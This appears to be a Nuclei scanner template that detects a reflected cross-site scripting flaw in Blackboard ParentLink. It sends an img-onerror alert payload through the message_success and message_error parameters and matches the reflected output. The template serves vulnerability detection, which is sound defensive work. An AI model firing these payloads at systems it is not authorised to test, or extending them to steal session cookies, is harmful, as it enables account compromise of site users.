id: parentlink-xss

info:
  name: Blackboard - Cross-Site Scripting
  author: r3naissance
  severity: high
  description: Blackboard contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: blackboard,parentlink,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
      - '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '<img src=c onerror=alert(8675309)>'
        part: body

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
